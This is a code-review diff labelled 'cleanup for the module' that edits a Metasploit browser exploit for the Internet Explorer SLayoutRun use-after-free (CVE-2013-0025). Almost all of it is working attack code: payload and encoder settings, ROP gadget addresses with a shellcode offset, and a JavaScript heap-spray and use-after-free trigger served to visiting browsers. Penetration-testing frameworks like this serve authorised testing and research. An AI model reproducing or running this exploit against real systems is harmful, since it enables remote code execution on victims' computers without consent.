cleanup for the module
parent
ade2c9ef56
commit
b4f4cdabbc
|
@ -8,12 +8,11 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = AverageRanking
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::RopDb
|
||||
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Microsoft Internet Explorer SLayoutRun Use-After-Free",
|
||||
|
@ -25,20 +24,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Scott Bell <scott.bell@security-assessment.com>', # Vulnerability discovery & Metasploit module
|
||||
'Scott Bell <scott.bell@security-assessment.com>' # Vulnerability discovery & Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2013-0025' ],
|
||||
[ 'MSB', 'MS13-009' ],
|
||||
[ 'URL', 'http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ],
|
||||
[ 'URL', 'http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00",
|
||||
'Space' => 1024,
|
||||
'Space' => 920,
|
||||
'DisableNops' => true,
|
||||
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
|
||||
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
|
@ -137,45 +136,35 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
rop_payload << [0x77c39f92].pack("V") # RETN
|
||||
rop_payload << [0x0c0c0c8c].pack("V") # Shellcode offset
|
||||
rop_payload << code
|
||||
|
||||
end
|
||||
|
||||
return rop_payload
|
||||
end
|
||||
|
||||
def this_resource
|
||||
r = get_resource
|
||||
return ( r == '/') ? '' : r
|
||||
end
|
||||
|
||||
def get_exploit(my_target, cli)
|
||||
p = get_payload(my_target, cli)
|
||||
js = heap_spray(my_target, p)
|
||||
|
||||
|
||||
html = %Q|
|
||||
<!doctype html>
|
||||
<html>
|
||||
<head>
|
||||
<script>
|
||||
var data
|
||||
var objArray = new Array(1800);
|
||||
#{js}
|
||||
</script>
|
||||
<script>
|
||||
var data;
|
||||
var objArray = new Array(1150);
|
||||
|
||||
setTimeout(function(){
|
||||
for (var i=0;i<objArray.length;i++){
|
||||
objArray[i] = document.createElement('body');
|
||||
document.body.appendChild(objArray[i])
|
||||
objArray[i].style.display = "none"
|
||||
}
|
||||
document.body.style.whiteSpace = "pre-line";
|
||||
|
||||
document.body.style.whiteSpace = "pre-line"
|
||||
CollectGarbage();
|
||||
|
||||
for(var i=0;i<10;i++){
|
||||
for (var i=0;i<(objArray.length-650);i++){
|
||||
for (var i=0;i<1150;i++){
|
||||
objArray[i] = document.createElement('div');
|
||||
objArray[i].className = data += unescape("%u0c0c%u0c0c");
|
||||
}
|
||||
}
|
||||
|
||||
setTimeout(function(){document.body.innerHTML = "boo"}, 100)
|
||||
}, 100)
|
||||
|
@ -192,19 +181,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
|
||||
def get_iframe
|
||||
html = %Q|
|
||||
<html>
|
||||
<body>
|
||||
<iframe src="#{this_resource}/#{@iframe_name}" height="1" width="1"></iframe>
|
||||
</body>
|
||||
</html>
|
||||
|
|
||||
|
||||
return html
|
||||
end
|
||||
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
agent = request.headers['User-Agent']
|
||||
uri = request.uri
|
||||
|
@ -218,21 +194,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return
|
||||
end
|
||||
|
||||
if uri =~ /#{@iframe_name}/
|
||||
html = get_exploit(my_target, cli)
|
||||
html = html.gsub(/^\t\t/, '')
|
||||
print_status("Sending HTML...")
|
||||
else
|
||||
html = get_iframe
|
||||
print_status "Sending IFRAME..."
|
||||
end
|
||||
print_status "Sending HTML..."
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
@iframe_name = "#{Rex::Text.rand_text_alpha(5)}.html"
|
||||
super
|
||||
end
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue